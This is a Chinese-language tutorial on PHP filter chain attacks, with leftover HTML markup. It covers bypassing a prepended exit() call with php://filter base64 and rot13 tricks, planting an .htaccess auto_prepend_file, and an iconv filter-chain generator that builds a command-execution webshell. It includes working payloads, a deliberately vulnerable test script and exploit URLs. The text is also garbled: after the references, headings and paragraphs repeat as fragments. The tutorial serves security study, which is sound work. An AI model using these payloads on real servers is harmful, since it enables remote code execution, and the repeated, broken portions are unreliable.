PHP Filter Chain 攻击技术深度解析<\/h1>

0x00 前言<\/h2>
Filter Chain（过滤器链）是PHP中一种强大的文件处理机制，通过组合不同的过滤器可以实现各种数据转换操作。本文将系统性地介绍Filter Chain在安全攻防中的应用，包括死亡杂糅绕过、iconv转换利用等技术要点。<\/p>

0x01 前置知识<\/h2>

Base64编码与解码<\/h3>

Base64编码字符表<\/strong>：<\/p>

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/
<\/code><\/pre>
编码过程<\/strong>：<\/p>

将输入数据按3字节一组分割<\/li>
每组拆分为4个6位单元<\/li>
每个6位单元映射到Base64字符表<\/li>
不足3字节时用=<\/code>补齐<\/li>
<\/ol>
示例：<\/p>
$data =<\/span> "Delete"<\/span>;
<\/span><\/span>echo<\/span> base64_encode<\/span>($data); \/\/ 输出: RGVsZXRl
<\/span><\/span><\/span><\/span>
<\/span><\/span>$data =<\/span> "Delet"<\/span>;
<\/span><\/span>echo<\/span> base64_encode<\/span>($data); \/\/ 输出: RGVsZXQ=
<\/span><\/span><\/span><\/code><\/pre>解码特性<\/strong>：<\/p>

以4个字符为一组进行解码<\/li>
仅对有效字符进行处理<\/li>
=<\/code>作为填充字符出现在末尾<\/li>
<\/ul>
0x02 死亡杂糅绕过技术<\/h2>
第一种情况：文件名和内容参数可控<\/h3>
攻击场景：<\/p>
file_put_contents<\/span>($filename, "<?php exit();"<\/span>.<\/span>$content);
<\/span><\/span><\/code><\/pre>Base64绕过方法<\/h4>
Payload构造<\/strong>：<\/p>
$filename =<\/span> 'php:\/\/filter\/convert.base64-decode\/resource=delete.php'<\/span>;
<\/span><\/span>$content =<\/span> 'aPD9waHAgcGhwaW5mbygpOw=='<\/span>;
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

添加前缀字符a<\/code>使有效负载长度对齐（4的倍数）<\/li>
Base64解码会忽略<?php exit();<\/code>中的非Base64字符<\/li>
解码后保留我们注入的有效负载<\/li>
<\/ol>
测试代码<\/strong>：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$filename =<\/span> $_GET['filename'<\/span>];
<\/span><\/span>$content =<\/span> $_GET['content'<\/span>];
<\/span><\/span>file_put_contents<\/span>($filename, "<?php exit();"<\/span>.<\/span>$content);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>利用URL<\/strong>：<\/p>
http:\/\/127.0.0.1\/2.php?filename=php:\/\/filter\/convert.base64-decode\/resource=delete.php&content=aPD9waHAgcGhwaW5mbygpOw==
<\/code><\/pre>
rot13绕过方法<\/h4>
Payload构造<\/strong>：<\/p>
$filename =<\/span> 'php:\/\/filter\/string.rot13\/resource=delete.php'<\/span>;
<\/span><\/span>$content =<\/span> '<?cuc cucvasb();?>'<\/span>;
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

rot13将<?php exit();<\/code>转换为不可执行形式<\/li>
我们的payload <?php phpinfo();?><\/code>转换为<?cuc cucvasb();?><\/code><\/li>
注意短标签可能导致解析问题<\/li>
<\/ul>
第二种情况：共用变量<\/h3>
攻击场景：<\/p>
file_put_contents<\/span>($content, "<?php exit();"<\/span>.<\/span>$content);
<\/span><\/span><\/code><\/pre>.htaccess预包含方法<\/h4>
Payload<\/strong>：<\/p>
$content =<\/span> 'php:\/\/filter\/write=string.strip_tags\/?> php_value%20auto_prepend_file%20G:\s1mple.php%0a%23\/resource=.htaccess'<\/span>;
<\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

使用string.strip_tags<\/code>过滤器去除PHP标签<\/li>
写入.htaccess文件设置自动包含<\/li>
%0a%23<\/code>是换行符和注释符，确保后续内容不影响<\/li>
<\/ol>
Base64直接使用的问题<\/h4>
尝试直接使用Base64时遇到问题：<\/p>
php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>write<\/span>=<\/span>convert<\/span>.<\/span>base64<\/span>-<\/span>decode<\/span>\/<\/span>PD9waHAgcGhwaW5mbygpOz8<\/span>+\/<\/span>resource<\/span>=<\/span>Cyc1e<\/span>.<\/span>php<\/span>
<\/span><\/span><\/code><\/pre>问题分析<\/strong>：<\/p>

PHP的Base64解码在严格模式下会将=<\/code>视为结束符<\/li>
相关PHP源码显示strict<\/code>参数控制此行为<\/li>
<\/ul>
解决方案<\/strong>：<\/p>

使用过滤器嵌套：<\/li>
<\/ol>
php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>write<\/span>=<\/span>string<\/span>.<\/span>strip_tags<\/span>|<\/span>convert<\/span>.<\/span>base64<\/span>-<\/span>decode<\/span>\/<\/span>resource<\/span>=?<\/span>PD9waHAgcGhwaW5mbygpOz8<\/span>%<\/span>2<\/span>B<\/span>\/..\/<\/span>s1mple<\/span>.<\/span>php<\/span>
<\/span><\/span><\/code><\/pre>
另类Base64方法：<\/li>
<\/ol>
php<\/span>:\/\/<\/span>filter<\/span>\/<?|<\/span>string<\/span>.<\/span>strip_tags<\/span>|<\/span>convert<\/span>.<\/span>base64<\/span>-<\/span>decode<\/span>\/<\/span>resource<\/span>=?<\/span>PD9waHAgcGhwaW5mbygpOz8<\/span>%<\/span>2<\/span>B<\/span>\/..\/<\/span>delete<\/span>.<\/span>php<\/span>
<\/span><\/span><\/code><\/pre>第三种情况：尾部追加内容<\/h3>
攻击场景：<\/p>
file_put_contents<\/span>($filename, $content.<\/span>"<\/span>\n<\/span>xxxxxx"<\/span>);
<\/span><\/span><\/code><\/pre>解决方法<\/strong>：<\/p>

使用注释符\/\/<\/code>或#<\/code>注释掉追加内容<\/li>
写入.htaccess文件进行预包含<\/li>
<\/ol>
0x03 iconv转换技术<\/h2>
iconv过滤器可用于字符集转换，结合Base64可实现复杂绕过。<\/p>
典型利用代码<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>$base64_payload =<\/span> "PD89YCRfR0VUWzBdYDs7Pz4"<\/span>;
<\/span><\/span>$conversions =<\/span> array<\/span>(
<\/span><\/span>    'R'<\/span> =><\/span> 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2'<\/span>,
<\/span><\/span>    \/\/ 更多转换规则...
<\/span><\/span><\/span><\/span>);
<\/span><\/span>
<\/span><\/span>$filters =<\/span> "convert.base64-encode|"<\/span>;
<\/span><\/span>$filters .=<\/span> "convert.iconv.UTF8.UTF7|"<\/span>;
<\/span><\/span>
<\/span><\/span>foreach<\/span>(str_split<\/span>(strrev<\/span>($base64_payload)) as<\/span> $c) {
<\/span><\/span>    $filters .=<\/span> $conversions[$c].<\/span>"|"<\/span>;
<\/span><\/span>    $filters .=<\/span> "convert.base64-decode|"<\/span>;
<\/span><\/span>    $filters .=<\/span> "convert.base64-encode|"<\/span>;
<\/span><\/span>    $filters .=<\/span> "convert.iconv.UTF8.UTF7|"<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$filters .=<\/span> "convert.base64-decode"<\/span>;
<\/span><\/span>$final_payload =<\/span> "php:\/\/filter\/<\/span>{<\/span>$filters}<\/span>\/resource=data:\/\/,aaaaaaaaaaaaaaaaaaaa"<\/span>;
<\/span><\/span>var_dump<\/span>(file_get_contents<\/span>($final_payload));
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>原理<\/strong>：<\/p>

通过多次Base64编码解码和字符集转换<\/li>
利用Base64的宽松解码特性<\/li>
最终构造出可执行的PHP代码<\/li>
<\/ol>
工具推荐<\/strong>：<\/p>

PHP_INCLUDE_TO_SHELL_CHAR_DICT<\/a> - 用于fuzz有效转换组合<\/li>
<\/ul>
0x04 php:\/\/temp和php:\/\/memory协议<\/h2>
特性<\/strong>：<\/p>

都是类似文件包装器的数据流<\/li>
php:\/\/memory始终使用内存<\/li>
php:\/\/temp在超过限制（默认2MB）后使用临时文件<\/li>
可设置内存限制：php:\/\/temp\/maxmemory:NN<\/code><\/li>
<\/ul>
示例<\/strong>：<\/p>
$fiveMBs =<\/span> 5<\/span> *<\/span> 1024<\/span> *<\/span> 1024<\/span>;
<\/span><\/span>$fp =<\/span> fopen<\/span>("php:\/\/temp\/maxmemory:<\/span>$fiveMBs<\/span>"<\/span>, 'r+'<\/span>);
<\/span><\/span>fputs<\/span>($fp, "hello<\/span>\n<\/span>"<\/span>);
<\/span><\/span>rewind<\/span>($fp);
<\/span><\/span>echo<\/span> stream_get_contents<\/span>($fp);
<\/span><\/span><\/code><\/pre>注意<\/strong>：<\/p>

这些流是一次性的，关闭后无法再次读取之前的内容<\/li>
file_put_contents后直接读取会得到空内容<\/li>
<\/ul>
参考资源<\/h2>

FilterChain攻击解析及利用 - Boogipop<\/a><\/li>
PHP过滤器链利用 - 阿里云先知社区<\/a><\/li>
PHP字符转换Fuzz工具<\/a><\/li>
<\/ol>

PHP Filter Chain 攻击技术深度解析<\/h1>

0x00 前言<\/h2> Filter Chain（过滤器链）是PHP中一种强大的文件处理机制，通过组合不同的过滤器可以实现各种数据转换操作。本文将系统性地介绍Filter Chain在安全攻防中的应用，包括死亡杂糅绕过、iconv转换利用等技术要点。<\/p>

0x01 前置知识<\/h2>

0x02 死亡杂糅绕过技术<\/h2>

0x03 iconv转换技术<\/h2> iconv过滤器可用于字符集转换，结合Base64可实现复杂绕过。<\/p>

0x04 php:\/\/temp和php:\/\/memory协议<\/h2> 特性<\/strong>：<\/p>

参考资源<\/h2> FilterChain攻击解析及利用 - Boogipop<\/a><\/li> PHP过滤器链利用 - 阿里云先知社区<\/a><\/li> PHP字符转换Fuzz工具<\/a><\/li> <\/ol>

0x00 前言<\/h2>
Filter Chain（过滤器链）是PHP中一种强大的文件处理机制，通过组合不同的过滤器可以实现各种数据转换操作。本文将系统性地介绍Filter Chain在安全攻防中的应用，包括死亡杂糅绕过、iconv转换利用等技术要点。<\/p>

0x03 iconv转换技术<\/h2>
iconv过滤器可用于字符集转换，结合Base64可实现复杂绕过。<\/p>

参考资源<\/h2>

FilterChain攻击解析及利用 - Boogipop<\/a><\/li>
PHP过滤器链利用 - 阿里云先知社区<\/a><\/li>
PHP字符转换Fuzz工具<\/a><\/li> <\/ol>